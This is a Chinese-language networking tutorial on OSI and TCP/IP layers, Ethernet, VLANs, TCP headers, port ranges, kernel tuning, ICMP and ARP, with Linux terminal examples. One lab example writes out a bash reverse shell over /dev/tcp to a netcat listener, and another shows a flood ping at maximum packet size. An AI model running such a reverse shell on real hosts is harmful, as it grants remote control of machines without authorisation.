网络功能和优点
        数据和应用程序
        资源
        网络存储
        备份设备
作用范围分类
        广域网(WAN,Wide Area Network)
        城域网(MAN,Metropolitan Area Network)
        局域网(LAN,Local Area Network)

1.2 常见的网络物理组件

1.3 网络应用程序

1.3.1 各种网络应用

        Web 浏览器（Chrome、Edge、IE、Firefox等）
        即时消息（QQ、微信、钉钉等）
        电子邮件（Outlook、foxmail 等）
        协作（视频会议、VNC、Netmeeting、WebEx 等）
        web网络服务（apache，nginx，IIS）
        文件网络服务（ftp ，nfs，samba）
        数据库服务（ MySQL，MariaDB，MongoDB)
        中间件服务（Tomcat，JBoss）
        安全服务（Netfilter）

1.3.2 应用程序对网络的要求

批处理应用程序
        FTP、TFTP、库存更新
        无需直接人工交互
        带宽很重要，但并非关键性因素
交互式应用程序
        库存查询、数据库更新
        人机交互
        因为用户需等待响应，所以响应时间很重要，但并非关键性因素，除非要等待很长时间
实时应用程序
        VoIP、视频
        人与人的交互
        端到端的延时至关重要

1.4 网络的特征

速度

成本
安全性
可靠性
可用性
可扩展性
拓扑

1.4.1 网络拓扑

拓扑结构一般是指由点和线排列成的几何图形
计算机网络的拓扑结构是指一个网络的通信链路和计算机结点相互连接构成的几何图形

拓扑分类
物理拓扑描述了物理设备的布线方式
逻辑拓扑描述了信息在网络中流动的方式

拓扑结构分类

总线拓扑：所有设备均可接收信号
星型拓扑：通过中心点传输，单一故障点
扩展星型拓扑：比星型拓扑的复原能力更强
环拓扑：信号绕环传输，单一故障点
双环拓扑：信号沿相反方向传输，比单环的复原能力更强
全网状拓扑：容错能力强，实施成本高
部分网状拓扑：在容错能力与成本之间寻求平衡

1.5 网络标准

1.5.1 网络标准和分层

旧模型：专有产品，由一个厂商控制应用程序和嵌入的软件
基于标准的模型：多厂商软件，分层方法

层次划分的必要性
计算机网络是由许多硬件、软件和协议交织起来的复杂系统。由于网络设计十分复杂，如何设计、组织和实现计算机网络是一个挑战，必须要采用科学有效的方法

层次划分的方法
        网络的第一层应当具有相对独立的功能
        梳理功能之间的关系，使一个功能可以为实现另一个功能提供必要的服务，从而形成系统的层次结构
        为提高系统的工作效率，相同或相近的功能仅在一个层次中实现，而且尽可能在较高的层次中实现每一层只为相邻的上一层提供服务

层次划分的优点
        各层之间相互独立，每一层只实现一种相对独立的功能，使问题复杂程度降低
        灵活性好，各层内部的操作不会影响其他层
        结构上可分割开，各层之间都可以采用最合适的技术来实现
        易于实现和维护，因为整个系统已被分解成相对独立的子系统
        能促进标准化工作，因为每一层的功能及其提供的服务都有了精确的说明

1.5.2 开放系统互联 OSI


#OSI 七层的记忆口诀
All People Seem To Need Data Process
物数网传会表应

在制定计算机网络标准方面，起着重大作用的两大国际组织是：国际电信联盟电信标准化部门，与国际标准化组织（ISO International Organization for Standardization），虽然它们工作领域不同，但随着科学技术的发展，通信与信息处理之间的界限开始变得比较模糊，这也成了国际电信联盟电信标准化部门和ISO共同关心的领域。1984年，ISO发布了著名的OSI(Open System Interconnection)标准，它定义了网络互联的7层框架，物理层、数据链路层、网络层、传输层、会话层、表示层和应用层），即OSI开放系统互连参考模型

OSI 模型的七层结构

第7层应用层
应用层（Application Layer）提供为应用软件而设的接口，以设置与另一应用软件之间的通信。例如:HTTP、HTTPS、FTP、TELNET、SSH、SMTP、POP3、MySQL等

第6层表示层
主条目：表示层（Presentation Layer）把数据转换为能与接收者的系统格式兼容并适合传输的格式

第5层会话层
会话层（Session Layer）负责在数据传输中设置和维护电脑网络中两台电脑之间的通信连接。

第4层传输层
传输层（Transport Layer）把传输表头（TH）加至数据以形成数据包。传输表头包含了所使用的协议等发送信息。例如:传输控制协议（TCP）等。

第3层网络层
网络层（Network Layer）决定数据的路径选择和转寄，将网络表头（NH）加至数据包，以形成报文。网络表头包含了网络数据。例如:互联网协议（IP）等。

第2层数据链接层
数据链路层（Data Link Layer）负责网络寻址、错误侦测和改错。当表头和表尾被加至数据包时，会形成信息框（Data Frame）。数据链表头（DLH）是包含了物理地址和错误侦测及改错的方法。数据链表尾（DLT）是一串指示数据包末端的字符串。例如以太网、无线局域网（Wi-Fi）和通用分组无线服务（GPRS）等。分为两个子层：逻辑链路控制（logical link control，LLC）子层和介质访问控制（Mediaaccess control，MAC）子层

第1层物理层
物理层（Physical Layer）在局部局域网上传送数据帧（Data Frame），它负责管理电脑通信设备和网
络媒体之间的互通。包括了针脚、电压、线缆规范、集线器、中继器、主机接口卡等

1.5.3 网络的通信过程

数据封装和数据解封

协议数据单元 PDU

PDU: Protocol Data Unit,协议数据单元是指对等层次之间传递的数据单位
        物理层的 PDU是数据位 bit
        数据链路层的 PDU是数据帧 frame
        网络层的PDU是数据包 packet
        传输层的 PDU是数据段 segment
        其他更高层次的PDU是消息 message

三种通讯模式

        unicast: 单播,目标设备是一个
        broadcast: 广播,目标设备是所有
        multicast: 多播,组播,目标设备是多个

冲突域和广播域

冲突域：两个网络设备同时发送数据,如果发生了冲突,则两个设备处于同一个冲突域,反之,则各自处于不同的冲突域

广播域：一个网络设备发送广播，另一个设备收到了,则两个设备处于同一个广播域,反之,则各自处于不同的广播域

三种通讯机制

        单工通信：只有一个方向的通信,比如: 收音机
        半双工通信：通信双方都可以发送和接收信息，但不能同时发送，也不能同时接收,比如:对讲机
        全双工通信：通信双方可以同时发送和同时接收,比如: 手机


#例：查看双工和速度
[root@localhost ~]# mii-tool eth0
eth0: negotiated 100baseTx-FD, link ok
 
[root@localhost ~]# mii-tool -v eth0
eth0: negotiated 100baseTx-FD, link ok
 product info: vendor 00:07:32, model 17 rev 5
 basic mode:  autonegotiation enabled
 basic status: autonegotiation complete, link ok
 capabilities: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
 advertising: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control
 link partner: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
 
 
[root@centos8 ~]#ethtool -i eth0
driver: vmxnet3
version: 1.4.16.0-k-NAPI
firmware-version:
expansion-rom-version:
bus-info: 0000:03:00.0
supports-statistics: yes
supports-test: no
supports-eeprom-access: no
supports-register-dump: yes
supports-priv-flags: no
 
[root@centos8 ~]#ethtool eth0
Settings for eth0:
Supported ports: [ TP ]
Supported link modes:  1000baseT/Full
           10000baseT/Full
Supported pause frame use: No
Supports auto-negotiation: No
Supported FEC modes: Not reported
Advertised link modes: Not reported
Advertised pause frame use: No
Advertised auto-negotiation: No
Advertised FEC modes: Not reported
Speed: 10000Mb/s
Duplex: Full
Port: Twisted Pair
PHYAD: 0
Transceiver: internal
Auto-negotiation: off
MDI-X: Unknown
Supports Wake-on: uag
Wake-on: d
Link detected: yes
 
[root@centos8 ~]#mii-tool  eth0
SIOCGMIIPHY on 'eth0' failed: Operation not supported
 
#网络断开的状态
[root@centos8 ~]#mii-tool -v eth1
eth1: no link
product info: Yukon 88E1011 rev 3
basic mode:  autonegotiation enabled
basic status: no link
capabilities: 1000baseT-FD 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
advertising: 1000baseT-FD 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
 
[root@centos8 ~]#ethtool eth1
Settings for eth1:
Supported ports: [ TP ]
Supported link modes:  10baseT/Half 10baseT/Full
           100baseT/Half 100baseT/Full
           1000baseT/Full
Supported pause frame use: No
Supports auto-negotiation: Yes
Supported FEC modes: Not reported
Advertised link modes: 10baseT/Half 10baseT/Full
           100baseT/Half 100baseT/Full
           1000baseT/Full
Advertised pause frame use: No
Advertised auto-negotiation: Yes
Advertised FEC modes: Not reported
Speed: Unknown!
Duplex: Unknown! (255)
Port: Twisted Pair
PHYAD: 0
Transceiver: internal
Auto-negotiation: on
MDI-X: Unknown (auto)
Supports Wake-on: d
Wake-on: d
Current message level: 0x00000007 (7)
   drv probe link
Link detected: no
 
[root@centos8 ~]#ip link
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT
group default qlen 1000
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode
DEFAULT group default qlen 1000
 link/ether 00:0c:29:f8:5d:b7 brd ff:ff:ff:ff:ff:ff
3: eth1: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN
mode DEFAULT group default qlen 1000
 link/ether 00:0c:29:f8:5d:c1 brd ff:ff:ff:ff:ff:ff
 
 
 
#例: 如何判断网线断开
root@centos8 ~]#mii-tool  eth1
eth1: no link
[root@centos8 ~]#ethtool eth1
Settings for eth1:
Supported ports: [ TP ]
Supported link modes:  10baseT/Half 10baseT/Full
                       100baseT/Half 100baseT/Full
                       1000baseT/Full
Supported pause frame use: No
Supports auto-negotiation: Yes
Supported FEC modes: Not reported
Advertised link modes: 10baseT/Half 10baseT/Full
                       100baseT/Half 100baseT/Full
                       1000baseT/Full
Advertised pause frame use: No
Advertised auto-negotiation: Yes
Advertised FEC modes: Not reported
Speed: Unknown!
Duplex: Unknown! (255)
Port: Twisted Pair
PHYAD: 0
Transceiver: internal
Auto-negotiation: on
MDI-X: Unknown (auto)
Supports Wake-on: d
Wake-on: d
Current message level: 0x00000007 (7)
   drv probe link
Link detected: no

2 局域网 Local Area Network

2.1 概述

2.1.1 特点

网络为一个单位所拥有
地理范围和站点数目均有限

2.1.2 主要功能

资源共享和数据通信

2.1.3 优点

能方便地共享昂贵的外部设备、主机以及软件、数据。从一个站点可以访问全网
便于系统的扩展和逐渐演变，各设备的位置可灵活的调整和改变
提高系统的可靠性、可用性和易用性

2.1.4 标准

IEEE（国际电子电气工程师协会）于1980年2月成立了局域网标准委员会（简称IEEE802委员会），专门从事局域网标准化工作，并制定了IEEE802标准。802标准所描述的局域网参考模型只对应OSI参考模型的数据链路层与物理层，它将数据链路层划分为逻辑链路层LLC子层和介质访问控制MAC子层.LLC子层负责向其上层提供服务MAC子层的主要功能包括数据帧的封装/卸装，帧的寻址和识别，帧的接收与发送，链路的管理，帧的差错控制等。MAC子层的存在屏蔽了不同物理链路种类的差异性。

2.2交换机 switch

交换机是工作在OSI参考模型数据链路层的设备，外表和集线器相似
它通过判断数据帧的目的MAC地址，从而将数据帧从合适端口发送出去
交换机是通过MAC地址的学习和维护更新机制来实现数据帧的转发
内部结构

工作原理
（1）交换机根据收到数据帧中的源MAC地址建立该地址同交换机端口的映射，并将其写入MAC地址表中
（2）交换机将数据帧中的目的MAC地址同已建立的MAC地址表进行比较，以决定由哪个端口进行转发
（3）如数据帧中的目的MAC地址不在MAC地址表中，则向所有端口转发。这一过程称为泛洪（flood）
（4）广播帧和组播帧向所有的端口转发

2.2.1集线器与交换机的比较

（1）交换机属于数据链路层设备，而集线器属于物理层设备
（2）集线器在转发帧时，不对传输介质进行检测，交换机在转发帧之前必须执行 CSMA/CD 算法。若在
发送过程中出现碰撞，就必须停止发送和进行退避。所以交换机能隔离冲突，而集线器却只能增加冲突
（3）交换机的每个端口可提供专用的带宽，而集线器的所有端口只能共享带宽
（4）集线器只能实现半双工传送，而交换机可支持全双工传送
（5）集线器和交换机都无法隔离广播域

2.2.2路由器 router

路由：把一个数据包从一个设备发送到不同网络里的另一个设备上去。这些工作依靠路由器来完成。路由器只关心网络的状态和决定网络中的最佳路径。路由的实现依靠路由器中的路由表来完成
路由器功能：
        工作在网络层
        分隔广播域和冲突域
        选择路由表中到达目标最好的路径
        维护和检查路由信息
        连接广域网

2.3 以太网技术

2.3.1 概述

以太网（Ethernet）是一种产生较早且使用相当广泛的局域网，由美国Xerox（施乐）公司的Palo Alto研究中心（简称为PARC）于20世纪70年代初期开始研究并于1975年研制成功

2.3.2 以太网MAC帧格式

2.3.3 MAC地址

在局域网中，硬件地址又称为物理地址或MAC地址（因为这种地址用在MAC帧中）
IEEE 802标准为局域网规定了一种48位的全球地址（一般都简称为“地址”)，是局域网中每一台计算机固化在网卡ROM中的地址
IEEE 的注册管理机构 RA 负责向厂家分配地址字段的前三个字节(即高位 24 位)
地址字段中的后三个字节(即低位 24 位)由厂家自行指派，称为扩展标识符，必须保证生产出的适配器没有重复地址

各大厂商MAC识别码:

http://standards-oui.ieee.org/oui/oui.txt

2.3.4 冲突检测的载波侦听多路访问 CSMA/CD

工作原理
        先听后发
        边发边听
        冲突停止
        延迟重发

2.4 虚拟局域网 VLAN

2.4.1 VLAN 原理

虚拟局域网 VLAN 是由一些局域网网段构成的与物理位置无关的逻辑组

这些网段具有某些共同的需求。每一个 VLAN 的帧都有一个明确的标识符，指明发送这个帧的工作站是属于哪一个 VLAN。虚拟局域网其实只是局域网给用户提供的一种服务，而并不是一种新型局域网优点
（1）更有效地共享网络资源。如果用交换机构成较大的局域网，大量的广播报文就会使网络性能下降。VLAN能将广播报文限制在本VLAN范围内，从而提升了网络的效能
（2）简化网络管理。当结点物理位置发生变化时，如跨越多个局域网，通过逻辑上配置VLAN即可形成网络设备的逻辑组，无需重新布线和改变IP地址等。这些逻辑组可以跨越一个或多个二层交换机
（3）提高网络的数据安全性。一个VLAN中的结点接收不到另一个VLAN中其他结点的帧

虚拟局域网的实现技术
        （1）基于端口的VLAN
        （2）基于MAC地址的VLAN
        （3）基于协议的VLAN
        （4）基于网络地址的VLAN

2.4.2 IEEE 802.1Q 帧结构

IEEE 802.1Q 帧结构

VLAN 标签各字段含义
TPID：Tag Protocol Identifier（标签协议标识符），2Byte，表示帧类型，取值为0x8100时表示IEEE802.1Q的VLAN数据帧。如果不支持802.1Q的设备收到这样的帧，会将其丢弃，各设备厂商可以自定义该字段的值。当邻居设备将TPID值配置为非0x8100时，为了能够识别这样的报文，实现互通，必须在本设备上修改TPID值，确保和邻居设备的TPID值配置一致

PRI：Priority，3bit，表示数据帧的802.1p（是IEEE 802.1Q的扩展协议）优先级。取值范围为0～7，值越大优先级越高。当网络阻塞时，交换机优先发送优先级高的数据帧

CFI：Canonical Format Indicator（标准格式指示位），1bit,表示MAC地址在不同的传输介质中是否以标准格式进行封装，用于兼容以太网和令牌环网。CFI取值为0表示MAC地址以标准格式进行封装，为1表示以非标准格式封装。在以太网中，CFI的值为0

VID：VLAN ID，12bit，表示该数据帧所属VLAN的编号。VLAN ID取值范围是0～4095。由于0和4095为协议保留取值，所以VLAN ID的有效取值范围是1～4094

2.5 分层的网络架构

架构一

架构二

架构三

3 TCP/IP 协议栈

3.1 TCP/IP 标准

3.1.1 TCP/IP 介绍

Transmission Control Protocol/Internet Protocol 传输控制协议/因特网互联协议
TCP/IP是一个Protocol Stack，包括TCP、IP、UDP、ICMP、RIP、TELNET、FTP、SMTP、ARP等许多协议
最早发源于1969年美国国防部（缩写为DoD）的因特网的前身ARPA网络项目，1983年1月1日，TCP/IP取代了旧的网络控制协议NCP，成为今天的互联网和局域网的基石和标准,由互联网工程任务组负责维护
国防高级研究计划局DARPA与BBN技术公司、斯坦福大学和伦敦大学学院签约，在多个硬件平台上开发协议的操作版本。在协议开发过程中，数据包路由层的版本号从版本 1 进展到版本 4，后者于 1983 年安装在 ARPANET 中。它被称为互联网协议版本4（IPv4）作为协议，仍在互联网使用，连同其目前的继承，互联网协议版本6（IPv6）。
RFC 文档: https://www.ietf.org/rfc/rfc1180.html

3.1.2 TCP/IP 分层

共定义了四层，和 OSI参考模型的分层有对应关系
RFC文档: https://www.ietf.org/rfc/rfc1122#section-1.3.3
RFC官方分为四层:
        Application Layer
        Transport Layer
        Internet Layer
        Link Layer(media-access)

TCP/IP 应用层

3.1.3 TCP/IP 通信过程

3.1.4 TCP/IP和OSI模型的比较

相同点
        两者都是以协议栈的概念为基础
        协议栈中的协议彼此相互独立
        下层对上层提供服务
不同点
        OSI是先有模型；TCP/IP是先有协议，后有模型
        OSI是国际标准，适用于各种协议栈；TCP/IP实际标准，只适用于TCP/IP网络
        层次数量不同

3.2 transport 层

TCP和UDP

3.2.1 TCP Transmission Control Protocol

TCP特性

工作在传输层
面向连接协议
全双工协议
半关闭
将数据打包成段，排序
确认机制
数据恢复，重传
错误检查
流量控制，滑动窗口
拥塞控制，慢启动和拥塞避免算法
更多关于tcp的内核参数，可参看man 7 tcp

TCP包头结构

TCP 包头

源端口、目标端口：计算机上的进程要和其他进程通信是要通过计算机端口的，而一个计算机端口
某个时刻只能被一个进程占用，所以通过指定源端口和目标端口，就可以知道是哪两个进程需要通
信。源端口、目标端口是用16位表示的，可推算计算机的端口个数为2^16个,即65536

序列号：表示本报文段所发送数据的第一个字节的编号。在TCP连接中所传送的字节流的每一个字
节都会按顺序编号。由于序列号由32位表示，所以每2^32个字节，就会出现序列号回绕，再次从 0
开始

确认号：表示接收方期望收到发送方下一个报文段的第一个字节数据的编号。也就是告诉发送方：
我希望你（指发送方）下次发送的数据的第一个字节数据的编号为此确认号

数据偏移：表示TCP报文段的首部长度，共4位，由于TCP首部包含一个长度可变的选项部分，需要指定这个TCP报文段到底有多长。它指出 TCP 报文段的数据起始处距离 TCP 报文段的起始处有多远。该字段的单位是32位(即4个字节为计算单位），4位二进制最大表示15，所以数据偏移也就是TCP首部最大60字节

URG：表示本报文段中发送的数据是否包含紧急数据。后面的紧急指针字段（urgent pointer）只
有当URG=1时才有效

ACK：表示是否前面确认号字段是否有效。只有当ACK=1时，前面的确认号字段才有效。TCP规
定，连接建立后，ACK必须为1,带ACK标志的TCP报文段称为确认报文段

PSH：提示接收端应用程序应该立即从TCP接收缓冲区中读走数据，为接收后续数据腾出空间。如
果为1，则表示对方应当立即把数据提交给上层应用，而不是缓存起来，如果应用程序不将接收到
的数据读走，就会一直停留在TCP接收缓冲区中

RST：如果收到一个RST=1的报文，说明与主机的连接出现了严重错误（如主机崩溃），必须释放连接，然后再重新建立连接。或者说明上次发送给主机的数据有问题，主机拒绝响应，带RST标志的TCP报文段称为复位报文段

SYN：在建立连接时使用，用来同步序号。当SYN=1，ACK=0时，表示这是一个请求建立连接的报文段；当SYN=1，ACK=1时，表示对方同意建立连接。SYN=1，说明这是一个请求建立连接或同意建立连接的报文。只有在前两次握手中SYN才置为1，带SYN标志的TCP报文段称为同步报文段

FIN：表示通知对方本端要关闭连接了，标记数据是否发送完毕。如果FIN=1，即告诉对方：“我的
数据已经发送完毕，你可以释放连接了”，带FIN标志的TCP报文段称为结束报文段

窗口大小：表示现在允许对方发送的数据量，也就是告诉对方，从本报文段的确认号开始允许对方
发送的数据量，达到此值，需要ACK确认后才能再继续传送后面数据，由Window size value *
Window size scaling factor（此值在三次握手阶段TCP选项Window scale协商得到）得出此值

校验和：提供额外的可靠性

紧急指针：标记紧急数据在数据字段中的位置
选项部分：其最大长度可根据TCP首部长度进行推算。TCP首部长度用4位表示，选项部分最长为：(2^4-1)*4-20=40字节

TCP协议PORT

传输层通过port号，确定应用层协议，范围0-65535

维基百科：https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
IANA互联网数字分配机构负责域名，数字资源，协议分配

0-1023：系统端口或特权端口(仅管理员可用) ，众所周知，永久的分配给固定的系统应用使用，
22/tcp(ssh), 80/tcp(http), 443/tcp(https)

1024-49151：用户端口或注册端口，但要求并不严格，分配给程序注册为某应用使用，
1433/tcp(SqlServer), 1521/tcp(oracle),3306/tcp(mysql),11211/tcp/udp (memcached)

49152-65535：动态或私有端口，客户端随机使用端口，范围定
义：/proc/sys/net/ipv4/ip_local_port_range


#例：调整客户端的动态端口范围
[root@centos8 ~]#cat /proc/sys/net/ipv4/ip_local_port_range
32768 60999
[root@centos8 ~]#echo 20000 62000 > /proc/sys/net/ipv4/ip_local_port_range
[root@centos8 ~]#cat /proc/sys/net/ipv4/ip_local_port_range
20000 62000
 
 
#例：
[root@centos8 ~]#dnf -y install man-pages
[root@centos8 ~]#man 2 socket
[root@centos8 ~]#dnf -y install nc
 
 
#服务器端
[root@centos8 ~]#ss -ntlu
Netid   State    Recv-Q  Send-Q  Local Address:Port      Peer
Address:Port
tcp    LISTEN    0       128     0.0.0.0:22         
 0.0.0.0:* 
tcp    LISTEN    0       128      [::]:22           
[::]:*    
[root@centos8 ~]#nc -l 22
Ncat: bind to :::22: Address already in use. QUITTING.
 
 
[root@centos8 ~]#nc -l 9527
I am centos7
I am centos8
 
 
#客户端
[root@centos7 ~]#nc 10.0.0.8 9527
I am centos7
I am centos8
 
 
#再开一个连接失败
[root@centos7 ~]#nc 10.0.0.8 9527
Ncat: Connection refused.
 
 
[root@centos8 ~]#ss -nt
State    Recv-Q    Send-Q   Local Address:Port         Peer
Address:Port
ESTAB    0       0        10.0.0.8:9527          
10.0.0.7:40706 
 
 
#服务器开启UDP的端口
[root@centos8 ~]#nc -l 7000 -u
 
 
#客户端连接
[root@centos7 ~]#nc 10.0.0.8 7000 -u
[root@centos8 ~]#ss -ntu
Netid   State    Recv-Q    Send-Q       Local Address:Port    
  Peer Address:Port   
udp    ESTAB    0       0             10.0.0.8:7000   
     10.0.0.7:52667   
tcp    ESTAB    0       0             10.0.0.8:8000   
     10.0.0.7:53402   
tcp    ESTAB    0       52            10.0.0.8:22    
     10.0.0.1:13305 
 
 
 
#例：找到端口冲突的应用程序
[root@centos8 ~]#nc -l 22
Ncat: bind to :::22: Address already in use. QUITTING.
 
[root@centos8 ~]#ss -ntlp
State  Recv-Q  Send-Q    Local Address:Port  Peer Address:Port     
 
LISTEN  0     128         0.0.0.0:22        0.0.0.0:*   
users:(("sshd",pid=699,fd=4)) 
LISTEN  0     128          [::]:22         [::]:*   
users:(("sshd",pid=699,fd=6)) 
 
[root@centos8 ~]#lsof -i :22
COMMAND PID USER  FD  TYPE DEVICE SIZE/OFF NODE NAME
sshd   699 root  4u IPv4  26846   0t0 TCP *:ssh (LISTEN)
sshd   699 root  6u IPv6  26848   0t0 TCP *:ssh (LISTEN)
sshd   1287 root  5u IPv4  29875   0t0 TCP centos8.localdomain:ssh-
>10.0.0.1:pc-mta-addrmap (ESTABLISHED)
sshd   1300 root  5u IPv4  29875   0t0 TCP centos8.localdomain:ssh-
>10.0.0.1:pc-mta-addrmap (ESTABLISHED)
 
 
 
#例：判断端口是否正在打开
[root@centos8 ~]#< /dev/tcp/127.0.0.1/80
[root@centos8 ~]#echo $?
0
[root@centos8 ~]#< /dev/tcp/127.0.0.1/8080
-bash: connect: Connection refused
-bash: /dev/tcp/127.0.0.1/8080: Connection refused
[root@centos8 ~]#echo $?
1
 
 
#例：利用重定向实现上网
[root@centos8 ~]#exec 8<>/dev/tcp/www.baidu.com/80
[root@centos8 ~]#ll /proc/$$/fd
total 0
lrwx------ 1 root root 64 Apr 20 14:14 0 -> /dev/pts/0
lrwx------ 1 root root 64 Apr 20 14:14 1 -> /dev/pts/0
lrwx------ 1 root root 64 Apr 20 14:14 2 -> /dev/pts/0
lrwx------ 1 root root 64 Apr 20 14:17 255 -> /dev/pts/0
lr-x------ 1 root root 64 Apr 20 14:14 3 -> /var/lib/sss/mc/passwd
lrwx------ 1 root root 64 Apr 20 14:14 4 -> 'socket:[32754]'
lrwx------ 1 root root 64 Apr 20 14:14 8 -> 'socket:[32777]'
[root@centos8 ~]#echo -e 'GET / HTTP/1.1\n' >& 8
[root@centos8 ~]#cat <& 8
 
 
 
#例：反弹 shell 实现远程控制
#在控制机监听打开端口
[root@centos8 ~]#dnf -y install nc
[root@centos8 ~]#nc -lvp 6666
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
 
#在被控制机上实现反弹shell
[root@centos7 ~]#bash -i &> /dev/tcp/10.0.0.8/6666 0>&1
 
#在控制机主机可以观察到以下信息，自动登录到被控制主机，且可以执行命令

3.2.2TCP端口号通信过程

3.2.3TCP确认和固定窗口

TCP滑动窗口

3.2.3.1三次握手和四次挥手

建立连接

TCP三次握手 TCP四次挥手

3.3内核TCP参数优化


#参看帮助： man 7 tcp
编辑文件/etc/sysctl.conf，加入以下内容：然后执行 sysctl -p 让参数生效。
net.ipv4.tcp_fin_timeout = 2
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_tw_recycle = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_keepalive_time = 600
net.ipv4.ip_local_port_range = 2000 65000
net.ipv4.tcp_max_syn_backlog = 16384
net.ipv4.tcp_max_tw_buckets = 36000
net.ipv4.route.gc_timeout = 100
net.ipv4.tcp_syn_retries = 1
net.ipv4.tcp_synack_retries = 1
net.ipv4.tcp_max_orphans = 16384
net.core.somaxconn = 16384
net.core.netdev_max_backlog = 16384
 
 
作用说明：
net.ipv4.tcp_fin_timeout 表示套接字由本端要求关闭，这个参数决定了它保持在FIN-WAIT-2状态
的时间，默认值是60秒。 该参数对应系统路径为：/proc/sys/net/ipv4/tcp_fin_timeout 60
 
net.ipv4.tcp_tw_reuse 表示开启重用。允许将TIME-WAIT sockets重新用于新的TCP连接，默认值
为0，表示关闭。 该参数对应系统路径为：/proc/sys/net/ipv4/tcp_tw_reuse 0
 
net.ipv4.tcp_tw_recycle 表示开启TCP连接中TIME-WAIT sockets的快速回收。 该参数对应系统路
径为：/proc/sys/net/ipv4/tcp_tw_recycle，默认为0，表示关闭。 提示：reuse和recycle这两个参
数是为防止生产环境下服务器time_wait网络状态数量过多设置的。
 
net.ipv4.tcp_syncookies 表示开启SYN Cookies功能。当出现SYN等待队列溢出时，启用Cookies
来处理，可防范少量SYN攻击，这个参数也可以不添加。 该参数对应系统路径
为：/proc/sys/net/ipv4/tcp_syncookies,默认值为1
 
net.ipv4.tcp_keepalive_time 表示当keepalive启用时，TCP发送keepalive消息的频度。默认是2小
时，建议改为10分钟。 该参数对应系统路径为：/proc/sys/net/ipv4/tcp_keepalive_time,默认为
7200秒。
 
net.ipv4.ip_local_port_range 该选项用来设定允许系统打开的端口范围，即用于向外连接的端口范
围。 该参数对应系统路径为：/proc/sys/net/ipv4/ip_local_port_range 32768 61000
 
net.ipv4.tcp_max_syn_backlog 表示SYN队列的长度，即半连接队列长度，默认为1024，建议加
大队列的长度为8192或更多，这样可以容纳更多等待连接的网络连接数。 该参数为服务器端用于
记录那些尚未收到客户端确认信息的连接请求最大值。 该参数对象系统路径
为：/proc/sys/net/ipv4/tcp_max_syn_backlog
 
net.ipv4.tcp_max_tw_buckets 表示系统同时保持TIME_WAIT套接字的最大数量，如果超过这个数
值，TIME_WAIT套接字将立刻被清除并打印警告信息。 默认为180000，对于Apache、Nginx等服
务器来说可以将其调低一点，如改为5000~30000，不通业务的服务器也可以给大一点，比如
LVS、Squid。 此项参数可以控制TIME_WAIT套接字的最大数量，避免Squid服务器被大量的
TIME_WAIT套接字拖死。 该参数对应系统路径为：/proc/sys/net/ipv4/tcp_max_tw_buckets
 
net.ipv4.tcp_synack_retries 参数的值决定了内核放弃连接之前发送SYN+ACK包的数量。 该参数
对应系统路径为：/proc/sys/net/ipv4/tcp_synack_retries,默认值为5
 
net.ipv4.tcp_syn_retries 表示在内核放弃建立连接之前发送SYN包的数量。 该参数对应系统路径
为：/proc/sys/net/ipv4/tcp_syn_retries,默认值为6
 
net.ipv4.tcp_max_orphans 用于设定系统中最多有多少个TCP套接字不被关联到任何一个用户文件
句柄上。 如果超过这个数值，孤立连接将被立即被复位并打印出警告信息。 这个限制只有为了防
止简单的DoS攻击。不能过分依靠这个限制甚至认为减少这个值，更多的情况是增加这个值。 该参
数对应系统路径为：/proc/sys/net/ipv4/tcp_max_orphans ，默认值8192
 
net.core.somaxconn 同时发起的TCP的最大连接数，即全连接队列长度，在高并发请求中，可能
会导致链接超时或重传，一般结合并发请求数来调大此值。 该参数对应系统路径
为：/proc/sys/net/core/somaxconn ，默认值是128
 
net.core.netdev_max_backlog 表示当每个网络接口接收数据包的速率比内核处理这些包的速率快
时，允许发送到队列的数据包最大数。 该参数对应系统路径
为：/proc/sys/net/core/netdev_max_backlog，默认值为1000

3.4UDP包头

3.5Internet层.

Internet Control Message Protocol


#例: 利用icmp协议判断网络状态
[root@centos7 ~]#ping 10.0.0.8
PING 10.0.0.8 (10.0.0.8) 56(84) bytes of data.
64 bytes from 10.0.0.8: icmp_seq=1 ttl=64 time=0.307 ms
 
#[root@centos7 ~]#ping 10.0.0.81
PING 10.0.0.81 (10.0.0.81) 56(84) bytes of data.
From 10.0.0.7 icmp_seq=1 Destination Host Unreachable
 
#
[root@centos8 ~]#ping -s 65508 10.0.0.8
Error: packet size 65508 is too large. Maximum is 65507
 
[root@centos8 ~]#ping -f -s 65507 172.18.0.200
PING 172.18.0.200 (172.18.0.200) 65507(65535) bytes of data.
...........................................................

Address Resolution Protocol

ARP
ARP 地址解析协议由互联网工程任务组（IETF）在1982年11月发布的RFC 826中描述制定，是根据IP地址获取物理地址的一个TCP/IP协议。

主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机，并接收返回消息，以此确定目标的物理地址；收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的，局域网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存

同网段的ARP

跨网段的ARP


#例：ARP 表
[root@xinxin ~]#ip neigh
192.168.1.110 dev eth0 lladdr 60:02:b4:e3:8a:c0 STALE
192.168.1.156 dev eth0 lladdr 50:01:d9:8a:1d:3f STALE
192.168.1.114 dev eth0 lladdr 40:8d:5c:e1:97:34 STALE
192.168.1.118 dev eth0 lladdr 94:65:2d:38:44:82 STALE
 
[root@xinxin ~]#arp -n
Address         HWtype HWaddress      Flags Mask      Iface
192.168.1.110      ether  60:02:b4:e3:8a:c0  C           eth0
192.168.1.156      ether  50:01:d9:8a:1d:3f  C           eth0
192.168.1.114      ether  40:8d:5c:e1:97:34  C           eth0
